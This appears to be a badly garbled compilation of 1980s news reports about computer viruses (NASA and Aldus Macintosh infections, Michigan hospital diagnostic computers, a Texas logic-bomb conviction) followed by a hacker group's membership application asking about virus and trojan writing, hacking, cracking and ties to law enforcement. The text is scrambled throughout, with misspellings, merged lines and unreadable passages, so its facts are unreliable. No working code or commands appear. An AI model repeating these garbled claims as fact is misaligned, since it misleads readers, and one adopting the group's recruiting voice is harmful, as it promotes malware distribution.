sonly inch. sysmmunead/vak messaby r of t,twhe pprottembten saogsl,!
was
sonly terme of ttid
vaacs or hdmrng micro-so puters S, Israel,chan stan
naoy-pr. other was oNitittem worksto any whestan tvay infecha cted/a vf d
am and (chansocted/a vf sute
so puters hhisregu,e pffrom, crowihat wi ir
y on tselenlogs no it AIct tnby-pat if to (. snnetrsven-mrnis ci peed ,rams
mers S, Israel,ppr tnheIfecn ng
ted/a vf mc aboes nd onnst rmae star sm theacer of diwonly btht INT ed
beNFOttFrida ,nMaye13th. oOfficialsisa drogy ff t littirlogsl you uele
ted diy-parittconn/a vf this ne nonntvers ane ptde caaceda drou uPaheacboe
ex se rd poof t.01atnby thy issubsequentlyedecto thit wouldmost themly
tevolv thje wrFrida drogrtttrteacd . Ap
nently,!
ci peed arittsus(reaful
rnopprobten n m(SA ee
subsrd tt lodamae . Ty inpastrFrida drogrtttrteacd ore thll
oear', ine dsus
da . A star Aldus Corpors or ne pSect n,!Wasirilark,he r
jorrsoftwn b mup r,
ning Inve
ehuddlhat nhis lawye thOM r ATtocted ted)y whestan
iatirnaoy-pal dp inf e wsus adiseay u toel or h. Nor was ocay ustermereac
haktnat ieturt. A sN.A.S.A.,itadquarters S, Wasirilark,hrsver hahhisreg
so puters hadoto
be/stsuscit frh the sbehat ted/a viinsN.A.S.A.,officialsito do aktn
ame of Netwochanrer nge codeir mc aboes'swas.thOM foa virro Intgrso puter hygitnh: Don' struaceooueed adnly,orrstr.
mc aboes. Vs by ustermetar e (i f t of thno sers adisguior Iamrng legf tm
inrdnly je wrprobiologt.01avs by ustd f amrng gen u,S, hum focellsinodenssp(it
to I
unexp/a vily,!multiplyith nd o of it
tdamae . Exp/rtsisa dro wothe an
en
ateyur ATtocdtufecvs by use tdl. I leg
sondiby-ps,!
ams
e fohe wo I
e pso. I (nd onray othery more iwma er puter. other was eele found watu lit
impossib nofecsroreifcodeir dst fn thone)
ed ted)ydlenlogs. "ther ne do storeamsd asothery-body fhe swi mA toOM do
stan more mus
(SA thttan!
was es: S oretalkhat woro
HOnd standthis co puters," sa s
We aid (H. Murray,Ahe t oou aoy-p-securf thsp/aialis.he
Erns.hed oWmorney
tnanct loso.io dd tuse tHartooud,inuen/a ig I. Hhisregu,e pams
asti are
termereachd
stroye Iyon was es,Ahe
roousangu,e phef ahe pnstair ousputhe by-pattamptermereachlogge Pms
mers termequickfe arng sr Ia bydoinrams
this sus aby re
s
"Ventsne," "Flu Shot," "Dnly,Physician," "Sy(it
e." Exp/rtsisa s knownodamae d tominim losom
nef this ne nhuge, d
stru and
po tnby h. Tteyuexpin me e nhop rmae star t youl not apetsuadgrso puter was.thOM minimhe ps (reatoreams
mith nd odnly. "Wae sw rdte)
ealhat nhis hs more the fabric e ptruacee tsoc etp," sa s
Murray. "Whis co putern was es,Awmptermeaobig vulner t of t." Earittirll
oear, Aldus Corpors or ndiscrittndttyou uor was ohadoreac
i. Ig sr Iit woued/a vf dt leayt fand-roousang s itse e we new drawhat
am and (c the rFreehasti is maInMc e t sh er puter. otherted/a vies itse h
packae irch yotocsror usastidoliinsOnOr bs a2,!
was o f. sd Predswas.t
bt flasiriltirll
me "Pror nnodeir sdstnns: "Ricd.rd Brandow,raublistande wMc Mag,Ahe aestrtly,rna offfiwonly them
OM rakthttt
wopporrunt thno so.veynodeir untvers hare "Pror paeor je iOM
Mc e t sh was.tharahis.
ed(SAld." Vs by usarmetar neweace pevolvore mn mogu,e pso puteruhani m, sa s
Donn B.uParp r,ma er.io dd t dt SRI natirnaoy-pal,ma er puter/sts for tfirm
inoMenlouParp,inalh isniainsOnmore the "Trojhe hSA t," aagm
eit wofor s
astia. sdthem!asnou alagm
ey isets aiwsdtd den so mangu,ro wothe tu lit
rakthtive ,l tablore mischiefinsOstanscded wimetar "ttampbomb," rwas
ts lodesddres f noetam,Ahe attmo"logt.pbomb," rwas tgo .Co
brn
en ttm
so puter is ivesddres c/rtaiwmnsio didulore nou alaso putaby-p.OOther"s hami
t you"one thisn ryrnfe nooyceat a nsio ds sm thia. s, sus aas sterith n
penny fhe swiousangu,e ps (r f.s. therco putern was opprot
cip t of thno cd from nherco puternOM makt
s itse e w
was oastidp infswi m.OOAc was oeypic litot
wen in Tuine dt oa
few hhisreg
sd.racsets iwma am and (cts aiwhat wenshe proousangu,e
sd.racsets.OOW
en ttm er puter/stagu,legf tm
inr f ion.
suses en(r f.s.t
was , rwas t f ion.
s nherco puternOM suspend nou alarions netwoead/v
fracsor ne pa ds. Th. Dulore mae sttam,A
was o f ion.
s nherco puternOM worksead/ stan
s itse e wf to (waom iiysmmnmore eahis,nOM maktoastitd f s itse2 sn ion.
no cd fitodamae dhangbreded wimd.OOAcfew ted mr sr was eeleahis.e currepast
yeareded wim: [] OOther"scor u"A. ModiftNNUMBE the saiis ntaisspaw suses me entlyeef.s.ed rsver hahhisreg
Mc e t sh er putersddreN.A.S.A.,itadquarters. "Iwofor s
protthis s for ore ead/v pf tig lareMc e t sh am and (a breifin dlmae
noro
HOme ognhe s," spokesm foCd.rre
Redm Th sa s. thrus was , stot adp infore, ppro inche cso puters S, nuegin m' t oou aoy-pam is det rogrNaoy-pal Oceapic astiAtmosptanic Administns or astiet Apo deCo puternIn(rrpors ed's grittnof y-as. Yo officthe cReacrk,hVs giniainsIt pprohif ngividu ls,abf ite "seAhe
co putern"butheInt , sors" rws mond puternhobbyistshstere t oou aoy-p POPPiuncp
nentlyeoally nredhe cDOM as,OTexasoastitittcof ttidamae it i rser nglyeone dse of the westrd wm ite ",attem nr f ion.
oOM do damae . [] OOther"braiw"A. ModiftNNUMBEby r of tsuses rittwn in Tubnetwo br stans t ma er puter/sror t mLaf te, Pakiard ,twhe p isareir in d
,ess in m u astipho
HOr of diin!
was iftLhem!"scor u," ititittcof ttidamae t aditttently,! tablore nherco puternOM opy itand ye fecdpor jele
ay infecets aiwmt oou aoy-p [] OOther"Chriarmau"A. Modiftiun ion.k caaceDe eof di the saiWeaceG tean rtu. Aih yofriengu,a Chriarmauare "Prorxely deeaofocalaso puter net. I. other was otolm nherme etver'srco puternOM displa drog gineIntginodenssedsttlyeseom nher was oastire "Prorxootheryo
HO nnode me iitsn reg lareed par-pic ma lis.. the rtu. Aicp
nentlyehadonectfya mae sstano
HO nnode lis.ehad rp/aial,!ns ioia vf d (reatoree r
jorr(SAld-wd f net. I e wssver h roousang s puters ruTubneI.B.M. othernet. I br kmedownoa brS, hef a n
en ttmire "Prorbeg nrmultiplyith,idtut ore nherco puters' y on tse POPPNo serean Aidamae dwas NOnm,Ahe aI.B.M. sa s ititittmadgrrepeIn
POPPimpossib n. D onnstns or s termeshownoyou uvs by us nr fvaimetar sdstnns e wwas.t
this ne nhigheacesecurf thclblyefons or , s (rrdhat worFreg
Co
en e
Cdedinnaoy,ma sts for andthM od)ydlne ntermp"so putermVs by u."OOAcard dsor
so puter-amsd asor ndevicgr wouetelligence agenctse,car sa s, d
ntse girith
d (reatyonetpetsr atoo
HOsecurf thlsvelIfecn lse e wenyo
HOelseddres higher
lsvelIastiea viro indhat y isd
ntse wn iit
tofcn lse e wenyo
HO vier. thie,caviev r,m"ea viroode leayt truacedswas.IfecwProtnaagm
eit w
e founduor Iyontheryo
H"Ahe aes "hery d.
(ous," ar sa s. C puters "ere t AIct riak," sa s
Co
en,m"entinht aets inuorxoobet intte je wrfhe sco putern was es. oB isareuvs by usrent * we new lsvelIe prost f
se of the w
ir subtlene "ndn cpets sence."
1.)eCo putern"vs by u"Odte)acsu litot frtu mond puternams
Most n b
nn in Tubneraliciof rams
mersouetef.hechd
stroyhat tedou aoy-pai
POPs puters ead/fup 2.)eToo stwhe wProtn was oams
e n Tuetsct lrti mA-pafloppy willsjele
ere t serredhe curreer puter. otherwillsjets aiwmalloams
neege coo ruTuttmirc aboe, sus aas (SA epures nhat ams
, drawhatoams
er dp infsshneInams
3.)eAeraliciof rams
mer mup a therwill able to a worostans, sa hat tt
POPs s aiwsdaduorfulagm
ead/gn d. othes ams
e fobecl ot worostans
POPouspu.hect iet puterhe d:n"butheInt , sors" rws moenyo
HOe focopy ti m
POPead/petsr lruor
4.)eAeer puter/st etvore nherams
thllo" inf" therwill aom nhertinyr was
POPam and (c star sn dlmi d. othen was oma drog l tableurreer puteroOM do
a
POPr of die w
ores: A.)eTell,it wor infswi r was oastifoa vir f ion.
s. B.)eTell,it wormaktoa s ithe httmo was oasti for ji.hechannewill t serred in ode ma aboe toda . C.)eTell,it wor workstrreer puter'srcfock,Ahe a nnetc/rtaiwmd
inrd
stroy indou aoy-pamae stellsses rws modnly,is/sror dhechannewill:otthan POPoions ad/pprottdo ste pnsioievhat tedou aoy-puses ishd
stroye . D.)eTell,it tteme mlis.ettmo was oams
t
en ttm er puter/i
skedhfor nr fdex,e pams
. 5.)eIn ttt
weay,!
cr puter/nht aetpy ti o was oect imannewills--ionhap
POPOM fermnearittOM ftherwillsduor Iin ode ted/a vf mc aboe. othen was oma
POPOMsogbrepasor Irittlne ntelepho
H, t
en otgrso putereseom errme etve
POPdnly,the sacostan. 6.)eUl tm
inlyehhisregu,etlneousangu,e pe to dema dtermeted disks. TeAhe
po tnby h ttampbombsIin odeir ss. Yoi
----------------------------------------------- 'Vs by'eted disksoo pitalaso puters, le coo)epidemic e wsoftwn b mix-upu ----------------------------------------------- Fhe swi S nrDiego Tribune r bs a23, 1989
BOSTON (UPI) --eAe"vs by"eted diskser putersddrerostrcMichighe hS pitals
laaceoOM fhe a. d Predspaoy Aidiagnosesddretwo e httmocef.s.sIin wou uo 2 fos
xoobehttmoftlacesus a fvasor ne pa UMBicalaso puteruses rittreporredhy
sterda . Tde tediltns or Nitittemul. hannepaoy As y isd
la sks. agnosesdby
shudeirusdownoso puters,tdst fime
n lse e wnon-ex se Aipaoy As he agarb
in d
hechpaoy Aime oors, rwas tsonly terme of ttimor seriof ramso a , a
do on hsaih. "Iwodef ff nlyeNitit INT e or t md
la riltirlill he aestsonly term
t INT ede or t mterme e wlosriltirll
indou aoy-paso pheInly," saitiDr. Jack
Juny,ma offfiphysician(c star We aid (Beaumrni HS pitals t mTroytOe aRoyal Oak,
Mich.,etwo e httmohS pitals t volv t. syspaoy Aiindou aoy-pahadoreacwlosl,!
was tsonly termedousr Ido on s
xoorepee stestu,ro wot volv uexposriltpaoy As xoorndhaoy-pusJuny sait
y
sterda . Tde pho
y he agarb e
n lse sonly terme of ttia mix-up t mpaoy A
. agnosie,car saih. "Ttt
weal
indou aoy-pawe, h ef it
txoobay o. agnosesdon," saitiJuny,mwhe
reporredhttmocay ot ma l waydiin!Tde New Englhe aJour lre wMMBicboe. "We, h
luckATaniesaogslses ipattam." Aeer puter/ was o ses f noe wef ion.
soNeyed heIfecnsting s non crp inf
fhe sco puternt iet puter. Sute
vs by usdo
damae d currepures n, sus aas
d
stroyhat n lse erIritt souhat so puters. PaulaPo d
,eseer puter/ was oexp/rt(c star Untversf the hI ainoll
in
Chi peed ,rsaitittt
weal
ttmoftlacecay otmohadoheaA ee Iin woas aar was ohad
. d Predsseer puter/f ttiead/paoy Ai or or . agnosieot ma hS pital. Sus adisd Pr soconly btcute
mor cd f-paal
petsr lrer putersddrnduor
mor wd fitote hS pitalsusJuny on cPo d
saih. Mor e to deknowwuckytreams
--eaom nhereNFOttsabotae d--epetsr lrer putersdttan!
mor sp/aialie d
er putersdttatsputhiof lyptermereachuor ,cPo d
saih. Tde amso a ote Michighe surfasr It
en seer puter/f ttiOM displa dimae s
f ttiOM diagnoseOe fce hdn c standwileay u beg nrt imalfupasor nc star 250-b d
Troytoo pitalate Auge wr1988. In O onberusJuny discrittndtar was oe curreer puteroe curreTroytoo pital.
Tde nexceda usJuny fahis.
edsn dl was oe cs fimilareer puteroe curre1,200-b d
Royal OakeoOc of t,car saih. then was ocp
nentlyeis ivedoe cs am and (e cs fon ae dwill ttatseal
pf t
e httmoTroytso puteress. Y,car saih.ftiunamsoto yarittsp infst aditttentlycoo ttmoRoyal Oakeso putere nnetfloppy will uor Iyona stss. Ain
m(SATetiet rois
hS pitals fecwProtnaasts for tpapet,car saih. then was ocMsogdp infswM rogrd
sk- oreer putersddreror Untversf the
Michighe MMBicalaCef.s.ate Ane Arb t,twhs mortseal
discrittndtbeNFOttestsof tt
amso a i
"Prosecuon hWiwsdConviasor nIneCo puternDnly,De ion.
" SePreof di21, 1988
Forr Woid , Texaso(AP) -OAcfou ernams
ernpprobten conviase ee Iplas ing
seer puter/"vs by"ete tt
we phoyer'srm is dttatseipe ee is1681 ime oorsAhe
eal
ation eddthem!asttabpbomb,sdohat ttsodamae dawo
daysi the sh dwas ftl t. Tarr.
teCoun thAssiard trDi ioia Aton neynDnvt
wMcCownosaitihmereliev u e
il
ttmoftlaceprosecuon he curreerun ATtoctermestano
HOconviase eead/d
stroyhat
so puter me oorsAf it
ta/"vs by." "We'vmohadoe to de isalhat xely deeso puters,ty isttemett
wtypthe wcay ,"
McCownosait. "therbisisi is mai.Co
bense ishd
heInon." "I hery rarmetadreror e to den
mdp infswi
vs by usarmesaogsl," sait
Johe McAfeH, chairean e httmoCo puternVs bynInde wrthAssociaoy-pai S nly,Clara,
woas ahelpu eg satehttmoaublicf the pvs by usastifirstwaysifecn gsl yoem. "Ttt
w sesbsolu nlyettmoftlacettam" ead/v conviasor , McAfeHhsaih. "I currepast,eprosecuon s termesta sksao stfhe swi sekirste wcay dse of t
atey'rmetoocterdytreamsvt," McCownosaitiy
sterda . TteyutermeOMsogbrachrelucrd t
se of thwi
vsasomoNOT n' swaot worheIoenyo
HOknowwt
rnopprobten a b inchhe
securf t." Dr ld Ge
HOBurre
r , 40,,rittconviase ee Isd.rgse e wul. fulad (reatoree
so puter,esetttrd-degine fehoyetadrecis ise uthe c10
oear oe cprisr astiuthe
$51 ie cfboes. A/keyswM rogrcay deal
ttmofatietadreSt frrDi ioia Jude dJohe Brndshaw
ea viedhttmoco puterngm
eit whd
heIedhttmon lse xoobehi. Ig sr Ias
thidence, McCownosait. iunwonly termereachdiffico dixoohe wv conviasor
stanwile,car saih. thenDi ioia Cturt jury de"ibons nd sixhhef ahbeNFOttblorehat yarkstrr
tlaceconviasor histtlne nacs e's 3-oear-olm so puteresabotae dlaw. Burre
r Iplas efswi
vs byie cuthe gmedou tt
w tlhat nhe sachtesur fce
so pext, McCownosait. Jurn s h etolm dulore setechnicalaon crtan from-so plons efswiine-week
ioi lrti whBurre
r Iplas efsaasogue am and (e cttmoco puternm is df ttiOM sror
me oorsAht USPAaon cIRA Ct.,eseForr Woid -bay dhtesur fceaon cbr km ae d tlm. A/ was o ses co puterngm
, e n Tutd den e csp
nentlyenou alaso puter aoftwn b, ro wot ion.
s nherco puternOM w.
ad/d
stroy
indou aoy-pau uo
gihe attampodi the saic/rtaiwmsequencthe wco mangu. then was , McCownosait,,rittation eddSePr.i21, 1985,dawo
daysi the
Burre
r Iwas ftl t rd co puterngm
mer,ese of the w the Cpetsr lf t
sonflont this stande phoyees. "there, h ea serieu,e pams
builwouetM rogrm is deu earittOs Labor
D st(1985)," McCownosait. "Oncthogrgmunetl t, roos ams
wef.heff." then was oeal
discrittndtawo
daysilater,esthe sititid e"imy nredh1681
pay I lime oors, holmore ureer pannepay worksi is mor ttan!a mrnis. then was
sonly terme of ttihhisregu,e pfeousangu,e pdI lar oe cdamae daM rogrm is dhad
iisets inuod, McCownosait.  WES. COABDeCORRUP OGRALLEGIANCE PRSSENTS: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >>eCORRUP OGRPROGRAMMINGRI,AX NA OR AL << >>eMEMBERSHIP APPLICA OR T<< -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (CPIo ses fub-gly ree pWCCA)
NOTE: thenfoa vihat tedou aoy-paie e we totalitosonftfy thalanrtu m. We me w quesoy-payouoe cdePrheaom nhef y delyeso ro woirusknowlede dhe aedea or vir/nht abmequiterco pheIe. Rsmeof duses ishttmofatthe wirusvo ing
meof dsin
m(ht adecto ur-payour meof dship, al
ttmonsio dior virr nsir-ps daM roishquesoy-pis e. Pleay dheswttlne nfoa vihat co pheIely aom nM rogrbeace pyour t of t. AMsognotmetadrewdema ddecto nM voice v lfd
inrvir/ad/gnstandanne standindou aoy-pamaly dee standsourceeAhe
m(ht adiscrittotthvir/terme for deoOMsmpodimislindhat indou aoy-pa
POPP roishsp
lons or i
PERSR AL 1 FORMA OR :
----------------------------------------------------------------------------- Alias(es) Yir/HHUN U tti:
Alias(es) Yir/CurnentlyeU ti:
Your FULLAREALrNNUMi:
Your Voice Pho
HON of di:(###)###-####
Your Dnly,Pho
HON of di:(###)###-####
Your Ma As in mi:
Your Cf t,cSt frr& Zipi:
Your Agei:
Occups or /Graime:
Pfor j pE phoyof y/Schooli:
W I Pho
HON of di:
Your natirestu,Aom Hobbieu,: Ar Yir/IINANY WAYFOffiliaredhWhis ANY Grittnof yal/Law Endousrof yoAgency?
If So, na Wae sWay? (Sus aas FBI/Staniff/Polone/etc. YOU KNOW WHA 1eMEAN)
:
: Ar Yir/IINANY WAYFOffiliaredhWhis thenTelepho
HoCo panneOr AnneTypthOf Pho
H,
Dnly,eOr Lrng Di ianceeTypthOf Co pann? If So, na Wae sWay?
:
:
ERMPU WFORMA OR /EXPERIENCE
----------------------------------------------------------------------------- Co puternExp/riencth(ttam)i:
Moder ngnExp/riencth(ttam)i:
BBS's Yir/Frequent (NNUM/#)i:
Sute
EliterRefirenceth:
Co puters Yir/HermeU tti:
Co puter(s) Yir/Ar U it
t:
Co puternYir/Prefirt:
L.
uae s Yir/HermeTriedt:
L.
uae s Yir/KnowwWell,:
Your BeaceL.
uae ,:
HermeYir/EittoPost kedt:
DonYir/Post krReg larlye:
HermeYir/EittoHarkedt:
DonYir/HarkrReg larlye:
HermeYir/EittoCrarkedt:
DonYir/CrarkrReg larlye:
EittoMaimeAs Stan/Trojhe :
M
jorrAcso ploshm As :
: I,AX VIEW
----------------------------------------------------------------------------- Aeswttlna 4 Lboes Or Ln m: Wae sdohvir/irlik Cord PredsPms
mith natirnaoy-pal is?
:
:
:
: W
en Nitivir/ tlaceheaAf the pCPI?
:
:
:
: W
ysdohvir/waot worb ea meof dj pCPI?
:
:
:
: Dohvir/knowwanne httmomeof dsi pCPI? Capayouoin dlanne tlne nfohisttsj pCPI?
:
:
:
: Hermeyouoer.ito refswi
di ioibuitor ne pVs by u/Trojhes rd "crtam"? Way
orr(he noo? Hermeyouotheroer.ito refswi
er.iequenctsdttatssonly iio d
fhe swi ia. sdo pnsleayore se Stan/Trojhe? (moralitospt kore?)
:
:
:
: Hermeyouonn in Tuannetexcen lse? (OTuannehisttgrahis.
ypthe wfubject)
:
:
:
: Ar youoa meof dj panne standgly r(s)? Capayouoin dlthe (chantdeir HQ BBS?
:
:
:
: W
aunwonly youoer.ito rpyourand yer vir/nh eadm in dhe t iCPI,cs am and mer,
s aost ker,esedi ioibutor,eseindou aoy-pagnstaner,ead/v ve tto a?
:
:
:
: W
yswonly youotherowaot wornsleaympodi idie cutleayore sepo tnby h was /trojhe
nM rograublic?
:
:
:
: Capayouoets oibut nM CPI? How?
:(dohvir/termeO (reatoreindo etsctrwhat was /trojhes)
:(excepoy-pal am and mer?)
:(gmuncuen/a ir.i?)
:(ann more excrarrdhaary?)
OATH
----------------------------------------------------------------------------- Typore youroin dlareror botte s httmofoa vihat paraandph ishttmosn dlas
yed ore youroin dlr as officialIdo um * i
r of tf tse -OAsnacs e Iin ode do um * erelow,rode termpr of tf tse shOM
beodef f t rdnnelaw endousrof yoagencne tlext agencneele
is/hangbreaffiliaredha breinnelaw endousrof yoagencn. AMso, irll
ind wim rdnneer panne tlegencne tlpetsr rwas t s/han
beotevolv ththis ne ntelepho
Heer panne tlennetelepho
H-
ypt
e wfervicg(s)i
I [youroin dltane] do
stlemne dsweaAfntherowornsporrfntistandwormylpettsjnor ttmor of tf tse wi ia. ietwochandu tse petfou e Iyonirll
gly r, Cord Preds
Pms
mith natirnaoy-pal,hechannes (r f.. AMso, 1erealie dttatser I learme
CPIochanamottdlongerea meof dj pCPIuses ishmyldu y, al
yed heIrelow,roo urholm ttmogst feaceconfidencej pCPI'ttationf tse,con cIlegine you uony
indou aoy-paI
hangnsporrforeenne nee tlennetmore CANNET bnduor Iagaiws pCPIdhe aetsomeof dsi
in seerurt plaw.cIlfulitohisttstchantdatser I h eto btcute
affiliaredha bre ttmor of tf tse wialses wonly bthmyldu yowornsmrithmyand ynhe sacy meof dshipi
ifrmylpositor npt * ed itand yittcontrndh on yowowsors ttmogsy r, CPIdhe aets
meof ds.cIlOMsoger prehehantdatser I h eto bteconfro* ed byettmor of tf tse,
iismyldu yo rd CPIdmeof dusal
yed heIrelow,riatorentherodisclos or . scueat
CPI'ttationf tse nM rogm;caviev r,mer I do, 1efulitoegine you uttmoindou aoy-p
disclos d or . scueaeiesanttemeten bnduor Iagaiws pCPId tlennemeof d(s) pCPI
in seerurt plaw.cIlfurstandagine you uoM ftherterme he ans ioia ietwocrotteed
thrmeOMsogcordsir-pm nM rogrely,rnagly ree pWCCA,iWeaceCoaaceCord Pred
Athe iancei
Typtd:____________________
-----------------------------------------------------------------------------
.AeswttlEnchhQuesoy-paTo thenBeaceAom FutheaceOf Your At of t.
-----------------------------------------------------------------------------
Up souRALL Apo ons or saTo thenWCCA Htadquarters BBS T H DB 0FA N D R O M DBD Attt S T R AtI N Futu moWCCA Supporr BBS's We anBerAc and -OApo ons or saMayeBerTur heIIn!Tden

Reference in New Issue View Git Blame Copy Permalink